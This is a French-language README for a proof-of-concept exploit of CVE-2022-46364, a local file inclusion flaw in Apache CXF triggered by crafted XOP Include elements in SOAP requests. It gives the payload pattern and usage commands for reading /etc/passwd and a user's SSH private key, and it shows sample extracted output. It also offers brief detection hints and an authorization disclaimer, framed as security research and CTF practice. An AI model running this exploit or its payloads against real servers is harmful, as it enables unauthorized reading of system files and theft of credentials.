
Exploit de preuve de concept pour CVE-2022-46364, une vulnérabilité d'inclusion de fichier local dans Apache CXF via des éléments XOP Include conçus dans les requêtes SOAP, permettant la lecture de fichiers arbitraires.
Ce dépôt contient un exploit de type preuve de concept (PoC) pour CVE-2022-46364, une vulnérabilité d'inclusion locale de fichier (LFI) dans Apache CXF.
La vulnérabilité provient d'une gestion incorrecte des éléments XOP (XML-binary Optimized Packaging) Include dans les requêtes SOAP, permettant aux attaquants de lire des fichiers arbitraires depuis le serveur.
Apache CXF traite incorrectement les éléments <xop:Include> dans les requêtes SOAP.
En fournissant un href spécialement conçu (par exemple file:///etc/passwd), le serveur peut inclure et renvoyer le contenu de fichiers locaux.
Vérifiez toujours la version vulnérable exacte dans votre environnement cible.
<xop:Include href="file:///path/to/file">.
├── cxf_lfi.sh # Exploit script
├── README.md # Documentation
├── LICENSE # MIT License
└── .gitignore
chmod +x cxf_lfi.sh
Mettez à jour la cible dans le script :
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Certains serveurs peuvent :
file://L'analyse de la sortie dépend du format de la réponse et peut nécessiter une inspection manuelle.
Surveillez les requêtes SOAP inhabituelles contenant :
<xop:Include>file://Ce projet est destiné à :
N'utilisez pas cet outil sur des systèmes sans autorisation explicite.
Développé dans le cadre de recherches en sécurité et de pratique CTF.